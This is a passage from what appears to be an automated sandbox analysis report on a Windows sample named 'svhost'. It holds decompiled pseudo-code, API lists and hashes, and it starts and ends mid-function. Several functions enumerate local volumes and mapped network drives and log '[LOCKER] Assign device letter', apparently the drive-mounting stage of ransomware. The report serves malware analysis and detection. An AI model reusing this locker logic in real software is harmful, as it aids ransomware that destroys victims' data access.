                                      				return E00E89A35(_t98, _v8 ^ _t136, _t130, _t134, _t135);
                                      			}

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64B1B
                                      • allocator.LIBCONCRTD ref: 00E64B94
                                      • construct.LIBCPMTD ref: 00E64BD8
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: >6
                                      • API String ID: 3172100163-2034285660
                                      • Opcode ID: 2cd0136e981d360e12e13357cbe9a04155b1c121ff7f90afa9115a3721a5aa26
                                      • Instruction ID: 670a70ce725432307442bf474a4501b9d5b3541504e1f7152c3debc084b6ac47
                                      • Opcode Fuzzy Hash: 2cd0136e981d360e12e13357cbe9a04155b1c121ff7f90afa9115a3721a5aa26
                                      • Instruction Fuzzy Hash: FE41A4B5E00109AFCB08DFA8D8919EEB7F5EF88340B109559E919B7351DB30AA45CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E6E5D0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				char _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t63;
                                      				void* _t67;
                                      				signed int _t136;
                                      
                                      				_t135 = __esi;
                                      				_t134 = __edi;
                                      				_t98 = __ebx;
                                      				_t63 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t63 ^ _t136;
                                      				_v20 = __ecx;
                                      				_v16 = E00E51100(_v20);
                                      				_v24 =  *((intOrPtr*)(_v16 + 0x10));
                                      				_t67 = E00E59FC0(__ebx, _v20, __edi, __esi);
                                      				_t143 = _t67 - _v24 - _a4;
                                      				if(_t67 - _v24 < _a4) {
                                      					E00E5BFD0();
                                      				}
                                      				_v32 = _v24 + _a4;
                                      				_v40 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_t17 =  &_v32; // 0xe6e435
                                      				_v36 = E00E5BFE0(_t98, _v20,  *_t17, _t134, _t135, _t143,  *_t17);
                                      				_v28 = E00E56580(_v20);
                                      				_v12 = E00E5A120(_v28,  ~(0 | _t143 > 0x00000000) | _v36 + 0x00000001);
                                      				E00E516F0(_t76, _v16);
                                      				_t29 =  &_v32; // 0xe6e435
                                      				 *((intOrPtr*)(_v16 + 0x10)) =  *_t29;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
                                      				if(_v40 < 8) {
                                      					E00E6E440( &_a8, _v48, _v16, _v24, _a12, _a16, _a20);
                                      					_t130 = _v16;
                                      					E00E5B410( &_v12, _v28, E00E51650(_v16),  &_v12);
                                      				} else {
                                      					asm("lfence");
                                      					_v44 =  *_v16;
                                      					E00E6E440( &_a8, _v48, E00E51650(_v44), _v24, _a12, _a16, _a20);
                                      					E00E5A150(_v28, _v44, _v40 + 1);
                                      					_t130 = _v16;
                                      					 *_v16 = _v12;
                                      				}
                                      				return E00E89A35(_t98, _v8 ^ _t136, _t130, _t134, _t135);
                                      			}

                                      APIs
                                        • Part of subcall function 00E59FC0: _Max_value.LIBCPMTD ref: 00E59FF6
                                        • Part of subcall function 00E59FC0: _Min_value.LIBCPMTD ref: 00E5A01C
                                      • allocator.LIBCONCRTD ref: 00E6E64B
                                      • allocator.LIBCPMTD ref: 00E6E6C4
                                      • construct.LIBCPMTD ref: 00E6E708
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: 5
                                      • API String ID: 3172100163-2308513669
                                      • Opcode ID: 238ea9f06b58ed4b1a6e00a01d97e772e0658e5dac597edf80412c28894f2b73
                                      • Instruction ID: ee881af205701733a000742e34d597012d04f1b45b487fee05877f316e22321c
                                      • Opcode Fuzzy Hash: 238ea9f06b58ed4b1a6e00a01d97e772e0658e5dac597edf80412c28894f2b73
                                      • Instruction Fuzzy Hash: 0441B3B5E00109AFCB08DFA8D8919EEB7F5EF48300F149569E919B7351DA30AA05CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 90%
                                      			E00E6C020(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v32;
                                      				char _v44;
                                      				char _v68;
                                      				char _v92;
                                      				char _v116;
                                      				char _v140;
                                      				char _v141;
                                      				char _v142;
                                      				char* _v148;
                                      				char _v149;
                                      				intOrPtr _v156;
                                      				char* _v160;
                                      				intOrPtr _v164;
                                      				signed int _t45;
                                      				signed int _t46;
                                      				signed char _t66;
                                      				void* _t77;
                                      				void* _t78;
                                      				signed int _t118;
                                      				void* _t119;
                                      				void* _t120;
                                      
                                      				_t117 = __esi;
                                      				_t116 = __edi;
                                      				_t81 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec16d0);
                                      				_push( *[fs:0x0]);
                                      				_t120 = _t119 - 0x94;
                                      				_t45 =  *0xeef074; // 0x221cac15
                                      				_t46 = _t45 ^ _t118;
                                      				_v20 = _t46;
                                      				_push(_t46);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v156 = __ecx;
                                      				_v141 = 0;
                                      				E00E515C0( &_v32, 0xc);
                                      				E00E6C770(__ebx, _v156, __edi, __esi,  &_v32);
                                      				E00E515C0( &_v44, 0xc);
                                      				E00E6C2A0(__ebx, _v156, __edi, __esi,  &_v44);
                                      				_t114 =  &_v44;
                                      				_v160 =  &_v44;
                                      				_v148 = E00E51BE0(_v160);
                                      				_v164 = E00E51BF0(_v160);
                                      				while(1) {
                                      					_t123 = _v148 - _v164;
                                      					if(_v148 == _v164) {
                                      						break;
                                      					}
                                      					_t114 = _v148;
                                      					E00E6C1F0(_t123, _v148);
                                      					if((E00E579A0( &_v92) & 0x000000ff) != 0) {
                                      						_t66 = E00E565B0( &_v32);
                                      						_t125 = _t66 & 0x000000ff;
                                      						if((_t66 & 0x000000ff) == 0) {
                                      							E00E57DE0(_t81,  &_v68, _t116, _t117, _t125, E00E6CAC0( &_v32));
                                      							E00E6CAF0( &_v32);
                                      							E00E517B0(E00E517B0(E00E517B0(E00E517B0(E00E517B0(E00E51100( &_v149), "[LOCKER] Assign device "),  &_v116), " letter "),  &_v68), L"\n\n");
                                      							_t77 = E00E51650( &_v68);
                                      							_t114 =  &_v116;
                                      							_t78 = E00E51650( &_v116);
                                      							_t120 = _t120 + 8;
                                      							E00E6C990(_v156, _t78, _t77);
                                      							_v141 = 1;
                                      							E00E57B40( &_v68);
                                      						}
                                      					}
                                      					E00E6C270( &_v140);
                                      					_v148 = _v148 + 0x48;
                                      				}
                                      				_v142 = _v141;
                                      				E00E6CAA0( &_v44);
                                      				E00E578B0( &_v32);
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t118;
                                      				return E00E89A35(_t81, _v20 ^ _t118, _t114, _t116, _t117);
                                      			}

                                      APIs
                                        • Part of subcall function 00E6C770: GetLogicalDrives.KERNEL32 ref: 00E6C7B9
                                        • Part of subcall function 00E6C770: std::ios_base::good.LIBCPMTD ref: 00E6C7FD
                                        • Part of subcall function 00E6C770: _Smanip.LIBCPMTD ref: 00E6C82B
                                        • Part of subcall function 00E6C770: task.LIBCPMTD ref: 00E6C864
                                        • Part of subcall function 00E6C2A0: FindFirstVolumeW.KERNEL32(?,00000104,0000000C,?,221CAC15), ref: 00E6C31D
                                        • Part of subcall function 00E6C2A0: FindVolumeClose.KERNEL32(000000FF), ref: 00E6C53F
                                      • std::ios_base::good.LIBCPMTD ref: 00E6C0ED
                                      • task.LIBCPMTD ref: 00E6C19D
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: FindVolumestd::ios_base::goodtask$CloseDrivesFirstLogicalSmanip
                                      • String ID: letter $[LOCKER] Assign device
                                      • API String ID: 4123301681-874473924
                                      • Opcode ID: b7d4684c3aaf88db6ebc63b3f3960ed11b03816876156008c6f1373c25041c90
                                      • Instruction ID: a4968fec6c02dfdc3a9c6812df651d0e4eaae4c4a66f8fb6c50d88f2414927e8
                                      • Opcode Fuzzy Hash: b7d4684c3aaf88db6ebc63b3f3960ed11b03816876156008c6f1373c25041c90
                                      • Instruction Fuzzy Hash: A2414B70D002588ACB14EBA4DC52BFEB7B5AF45340F5465A9A44AB7282EF346A49CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 84%
                                      			E00E66CF0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
                                      				char _v16;
                                      				signed int _v20;
                                      				short _v24;
                                      				short _v28;
                                      				char _v52;
                                      				int _v56;
                                      				char _v58;
                                      				intOrPtr _v64;
                                      				intOrPtr _v68;
                                      				intOrPtr _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v88;
                                      				char _v92;
                                      				signed int _t39;
                                      				signed int _t40;
                                      				intOrPtr* _t52;
                                      				signed int _t95;
                                      
                                      				_t103 = __eflags;
                                      				_t94 = __esi;
                                      				_t93 = __edi;
                                      				_t64 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec10c0);
                                      				_push( *[fs:0x0]);
                                      				_t39 =  *0xeef074; // 0x221cac15
                                      				_t40 = _t39 ^ _t95;
                                      				_v20 = _t40;
                                      				_push(_t40);
                                      				_t2 =  &_v16; // 0xe66c23
                                      				 *[fs:0x0] = _t2;
                                      				_v72 = __ecx;
                                      				_v28 = 0;
                                      				_v24 = 0;
                                      				_t6 =  &_a8; // 0xe66c23
                                      				 *((short*)(_t95 + 0xffffffffffffffe8)) =  *_t6;
                                      				 *((short*)(_t95 + 0xbadb95)) = 0x3a;
                                      				_v56 = 0x104;
                                      				E00E57C30(__ebx,  &_v52, __edi, __esi, __eflags, _v56, 0);
                                      				WNetGetConnectionW( &_v28, E00E57A90( &_v52, 0),  &_v56);
                                      				_v58 = 0;
                                      				_v64 =  *((intOrPtr*)(E00E67050( &_v76,  &_v52)));
                                      				_t52 = E00E67050( &_v80,  &_v52);
                                      				_v68 =  *((intOrPtr*)(E00E67070(__ebx, __edi, __esi, _t103,  &_v88,  *((intOrPtr*)(E00E67030( &_v84,  &_v52))),  *_t52,  &_v58)));
                                      				E00E66E20(__ebx,  &_v52, __edi, __esi, _t103,  &_v92, _v68, _v64);
                                      				E00E57BA0(_a4, E00E51650( &_v52));
                                      				E00E57B40( &_v52);
                                      				_t36 =  &_v16; // 0xe66c23
                                      				 *[fs:0x0] =  *_t36;
                                      				return E00E89A35(_t64, _v20 ^ _t95, _v68, _t93, _t94);
                                      			}

                                      APIs
                                      • WNetGetConnectionW.MPR(00EC10C0,00000000,00000000), ref: 00E66D6F
                                        • Part of subcall function 00E67070: _Find_unchecked.LIBCPMTD ref: 00E670BA
                                      • task.LIBCPMTD ref: 00E66DF7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ConnectionFind_uncheckedtask
                                      • String ID: #l$#l
                                      • API String ID: 3799698842-189179905
                                      • Opcode ID: ba6c28e2cc6f3bbe7243bc399d57207b180d6c49d60ca0e45f89952acbf5383f
                                      • Instruction ID: a0b3e00a0bf5dd2b84ce0676173e30a15cff4258d6e9c8da9176d1e3d42bfa05
                                      • Opcode Fuzzy Hash: ba6c28e2cc6f3bbe7243bc399d57207b180d6c49d60ca0e45f89952acbf5383f
                                      • Instruction Fuzzy Hash: 7041FFB6D24108AFCB04EFE4E991FEEB7B9FF58704F005529F506A7251EA305604CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E59320(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				signed int _v8;
                                      				char _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				intOrPtr _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				char _v44;
                                      				signed int _v48;
                                      				signed int _t45;
                                      				signed int _t96;
                                      
                                      				_t95 = __esi;
                                      				_t94 = __edi;
                                      				_t69 = __ebx;
                                      				_t45 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t45 ^ _t96;
                                      				_v24 = __ecx;
                                      				_v16 = E00E51100(_v24);
                                      				_v28 = E00E51100(_a4);
                                      				_t7 =  &_v28; // 0xe57e5c
                                      				_v20 =  *((intOrPtr*)( *_t7 + 0x10));
                                      				_t10 =  &_v28; // 0xe57e5c
                                      				_v36 = E00E58DB0( *_t10);
                                      				if(_v20 >= 8) {
                                      					_v32 = E00E56580(_v24);
                                      					_v44 = E00E59FC0(__ebx, _v24, __edi, __esi);
                                      					_v48 = _v20 | 0x00000007;
                                      					_v40 =  *((intOrPtr*)(E00E5A210( &_v48,  &_v44)));
                                      					_v12 = E00E5A120(_v32, _v40 + 1);
                                      					E00E5B410(_v16, _v32, E00E51650(_v16),  &_v12);
                                      					E00E5A100(E00E51650(_v12), _v36, _v20 + 1);
                                      					 *(_v16 + 0x10) = _v20;
                                      					_t92 = _v16;
                                      					 *((intOrPtr*)(_v16 + 0x14)) = _v40;
                                      				} else {
                                      					E00E5A100(_v16, _v36, 8);
                                      					_t92 = _v20;
                                      					 *(_v16 + 0x10) = _v20;
                                      					 *((intOrPtr*)(_v16 + 0x14)) = 7;
                                      				}
                                      				return E00E89A35(_t69, _v8 ^ _t96, _t92, _t94, _t95);
                                      			}

                                      APIs
                                      • _Min_value.LIBCPMTD ref: 00E593B4
                                      • allocator.LIBCONCRTD ref: 00E593CB
                                      • construct.LIBCPMTD ref: 00E593E8
                                        • Part of subcall function 00E5A100: _wmemmove.LIBCMTD ref: 00E5A10F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Min_value_wmemmoveallocatorconstruct
                                      • String ID: \~
                                      • API String ID: 3937789765-3289573539
                                      • Opcode ID: 3c98d77a5a41e3627661661d4bb4589092f134af614967d8ae0d26ae1ed6d4ce
                                      • Instruction ID: 24e1e25395a58017309d279d9d3c8d6670b826e9941c003e01dc3dd69fb1f1d6
                                      • Opcode Fuzzy Hash: 3c98d77a5a41e3627661661d4bb4589092f134af614967d8ae0d26ae1ed6d4ce
                                      • Instruction Fuzzy Hash: 6B31ECB5D002089FCB04DFA4D9929EEB7F5FF48301F149969E915B7341EB31AA04CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E00E71438(void* __ecx, void* __edx, void* __eflags) {
                                      				intOrPtr* _t9;
                                      				intOrPtr* _t10;
                                      				intOrPtr* _t11;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t14;
                                      				void* _t22;
                                      
                                      				_push(8);
                                      				E00E8A3C2();
                                      				 *((intOrPtr*)(_t22 - 4)) = 0;
                                      				_t9 = E00EA0A80(__eflags);
                                      				_t26 =  *_t9;
                                      				if( *_t9 == 0) {
                                      					L5:
                                      					_t10 =  *((intOrPtr*)(_t22 + 8));
                                      					 *_t10 = 0;
                                      					 *((intOrPtr*)(_t10 + 4)) = 0;
                                      				} else {
                                      					_t11 = E00EA0A89(_t26);
                                      					_t27 =  *_t11;
                                      					if( *_t11 != 0) {
                                      						goto L5;
                                      					} else {
                                      						_t12 = E00EA0A80(_t27);
                                      						_t28 =  *((intOrPtr*)( *_t12)) - 0xe0434f4d;
                                      						if( *((intOrPtr*)( *_t12)) == 0xe0434f4d) {
                                      							goto L5;
                                      						} else {
                                      							_t14 = E00EA0A80(_t28);
                                      							_t29 =  *((intOrPtr*)( *_t14)) - 0xe0434352;
                                      							if( *((intOrPtr*)( *_t14)) == 0xe0434352) {
                                      								goto L5;
                                      							} else {
                                      								 *((char*)(_t22 - 0x11)) = 1;
                                      								_push(_t22 - 0x11);
                                      								_push(E00EA0A80(_t29));
                                      								_push( *((intOrPtr*)(_t22 + 8)));
                                      								E00E71012(__ecx, __edx, _t29);
                                      								_t10 =  *((intOrPtr*)(_t22 + 8));
                                      							}
                                      						}
                                      					}
                                      				}
                                      				E00E8A331();
                                      				return _t10;
                                      			}

                                      APIs
                                      • __EH_prolog3_catch.LIBCMT ref: 00E7143F
                                      • make_shared.LIBCPMT ref: 00E7148A
                                        • Part of subcall function 00E71012: __EH_prolog3.LIBCMT ref: 00E71019
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prolog3H_prolog3_catchmake_shared
                                      • String ID: MOC$RCC
                                      • API String ID: 1798871530-2084237596
                                      • Opcode ID: ffb449abe9d41da0bbf715f061cbc3d86f178972671b2072397cd2c82b77e086
                                      • Instruction ID: 163e9c57fa82bc6510f3cc18379ef047b74a70b15f0d5787312753873dd8d7a3
                                      • Opcode Fuzzy Hash: ffb449abe9d41da0bbf715f061cbc3d86f178972671b2072397cd2c82b77e086
                                      • Instruction Fuzzy Hash: 24F03C30604354CFCB22EBA8C40195C36A4AF06700F05A1E5F418BF221D73CAD858BA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00E526E0(intOrPtr __ecx, void* __eflags) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				intOrPtr _v20;
                                      				char _v32;
                                      				void* _t14;
                                      
                                      				_v8 = __ecx;
                                      				_t14 = E00E7198F(__ecx, _v8);
                                      				if(_t14 != 0) {
                                      					_v16 = _v8;
                                      					_v12 = _v16;
                                      					_t28 = _v12;
                                      					if(_v12 == 0) {
                                      						_v20 = 0;
                                      					} else {
                                      						_v20 = E00E527D0(_v12, _t28, 1);
                                      					}
                                      					E00E51AE0( &_v32, "Fail to schedule the chore!");
                                      					return E00EA0C81( &_v32, 0xeeda64);
                                      				}
                                      				return _t14;
                                      			}

                                      APIs
                                        • Part of subcall function 00E7198F: Concurrency::details::_Reschedule_chore.LIBCPMT ref: 00E719B6
                                      • Concurrency::wait.LIBCONCRTD ref: 00E52710
                                        • Part of subcall function 00E527D0: std::exception_ptr::~exception_ptr.LIBCONCRTD ref: 00E527DA
                                      • std::bad_exception::bad_exception.LIBCMTD ref: 00E52729
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E52737
                                      Strings
                                      • Fail to schedule the chore!, xrefs: 00E52721
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::details::_Concurrency::waitException@8Reschedule_choreThrowstd::bad_exception::bad_exceptionstd::exception_ptr::~exception_ptr
                                      • String ID: Fail to schedule the chore!
                                      • API String ID: 892878918-3313369819
                                      • Opcode ID: 3eb3a2d5ac586805b43375999f6b9826a4f7df1f431920701c0d1fbd23dab8a6
                                      • Instruction ID: 68226881a6fc5d8bd5cbdb11c694e1f28efecc430f0f8f6a342c6da58c987ae4
                                      • Opcode Fuzzy Hash: 3eb3a2d5ac586805b43375999f6b9826a4f7df1f431920701c0d1fbd23dab8a6
                                      • Instruction Fuzzy Hash: 28F06270D0430CABCB00EFD4D8417ADB7B4AB14301F1055ADED1577281D7B46A09DB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E00E66BA0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v21;
                                      				char _v36;
                                      				char _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				char _v69;
                                      				char _v74;
                                      				char _v76;
                                      				signed int _v80;
                                      				intOrPtr _v84;
                                      				char _v92;
                                      				signed int _t40;
                                      				signed int _t41;
                                      				signed char _t54;
                                      				signed int* _t57;
                                      				void* _t61;
                                      				void* _t64;
                                      				void* _t66;
                                      				void* _t97;
                                      				void* _t98;
                                      				signed int _t99;
                                      				void* _t100;
                                      				void* _t101;
                                      
                                      				_t98 = __esi;
                                      				_t97 = __edi;
                                      				_t66 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec10c0);
                                      				_push( *[fs:0x0]);
                                      				_t101 = _t100 - 0x4c;
                                      				_t40 =  *0xeef074; // 0x221cac15
                                      				_t41 = _t40 ^ _t99;
                                      				_v20 = _t41;
                                      				_push(_t41);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v84 = __ecx;
                                      				_v69 = 0;
                                      				E00E515C0( &_v36, 0xc);
                                      				E00E566A0( &_v36);
                                      				_v80 = GetLogicalDrives();
                                      				_v68 = 0;
                                      				while(1) {
                                      					_t103 = _v68 - 0x1a;
                                      					if(_v68 >= 0x1a) {
                                      						break;
                                      					}
                                      					_v64 = (_v68 & 0x0000ffff) + 0x41;
                                      					E00E66CF0(_t66,  &_v21, _t97, _t98, _t103,  &_v60, _v64 & 0x0000ffff);
                                      					_t54 = E00E579A0( &_v60);
                                      					_t91 = _t54 & 0x000000ff;
                                      					if((_t54 & 0x000000ff) != 0) {
                                      						_t91 = 0x00000001 << _v68 & _v80;
                                      						__eflags = 0x00000001 << _v68 & _v80;
                                      						if(__eflags != 0) {
                                      							_v76 = _v64;
                                      							_t57 = E00E51BB0( &_v92,  &_v76,  &_v74);
                                      							_push(_t57[1]);
                                      							_t91 =  *_t57;
                                      							E00E66E90( &_v60, _t97, _t98, __eflags,  *_t57);
                                      							E00E66920( &_v60, L":\\");
                                      							_t61 = E00E51650( &_v60);
                                      							_t101 = _t101 + 4;
                                      							E00E61E50( &_v36, _t61);
                                      						}
                                      					} else {
                                      						_t64 = E00E51650( &_v60);
                                      						_t101 = _t101 + 4;
                                      						E00E61E50( &_v36, _t64);
                                      					}
                                      					E00E57B40( &_v60);
                                      					_v68 = _v68 + 1;
                                      				}
                                      				E00E57460(_a4, E00E51650( &_v36));
                                      				E00E578B0( &_v36);
                                      				 *[fs:0x0] = _v16;
                                      				__eflags = _v20 ^ _t99;
                                      				return E00E89A35(_t66, _v20 ^ _t99, _t91, _t97, _t98);
                                      			}

                                      Instruction addresses for this listing (the per-statement address column was lost in extraction): 0x00e66ba0 to 0x00e66ce6

                                      APIs
                                      • GetLogicalDrives.KERNEL32 ref: 00E66BE2
                                        • Part of subcall function 00E66CF0: WNetGetConnectionW.MPR(00EC10C0,00000000,00000000), ref: 00E66D6F
                                        • Part of subcall function 00E66CF0: task.LIBCPMTD ref: 00E66DF7
                                      • std::ios_base::good.LIBCPMTD ref: 00E66C26
                                      • _Smanip.LIBCPMTD ref: 00E66C6B
                                      • task.LIBCPMTD ref: 00E66CA4
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$ConnectionDrivesLogicalSmanipstd::ios_base::good
                                      • String ID:
                                      • API String ID: 280476529-0
                                      • Opcode ID: e0eabd28da7c1277302979a5f0c05a25988bde8aba040217ed797935427e1489
                                      • Instruction ID: 5ff4cda2334e6d7fffef187a51e86cf9ec2c8f0ff2853d8cfc1b8ac7b8dcf19d
                                      • Opcode Fuzzy Hash: e0eabd28da7c1277302979a5f0c05a25988bde8aba040217ed797935427e1489
                                      • Instruction Fuzzy Hash: ED415BB1C20118EBCB08EFA4EC51AEEB7B5FF54344F445569F802B7291EB34A909CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 86%
                                      			E00E6C770(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v24;
                                      				char _v36;
                                      				char _v60;
                                      				signed int _v64;
                                      				signed int _v68;
                                      				char _v70;
                                      				char _v72;
                                      				intOrPtr _v76;
                                      				signed int _v80;
                                      				char _v88;
                                      				signed int _t39;
                                      				signed int _t40;
                                      				signed char _t54;
                                      				signed int* _t60;
                                      				void* _t64;
                                      				void* _t66;
                                      				void* _t95;
                                      				void* _t96;
                                      				signed int _t97;
                                      				void* _t98;
                                      				void* _t99;
                                      
                                      				_t96 = __esi;
                                      				_t95 = __edi;
                                      				_t66 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1760);
                                      				_push( *[fs:0x0]);
                                      				_t99 = _t98 - 0x48;
                                      				_t39 =  *0xeef074; // 0x221cac15
                                      				_t40 = _t39 ^ _t97;
                                      				_v20 = _t40;
                                      				_push(_t40);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v76 = __ecx;
                                      				E00E53840( &_v24, _v76);
                                      				E00E515C0( &_v36, 0xc);
                                      				E00E566A0( &_v36);
                                      				_v80 = GetLogicalDrives();
                                      				_v68 = 0;
                                      				while(1) {
                                      					_t101 = _v68 - 0x1a;
                                      					if(_v68 >= 0x1a) {
                                      						break;
                                      					}
                                      					_v64 = (_v68 & 0x0000ffff) + 0x41;
                                      					E00E6C8B0(_t66,  &_v24, _t95, _t96, _t101,  &_v60, _v64 & 0x0000ffff);
                                      					_t54 = E00E579A0( &_v60);
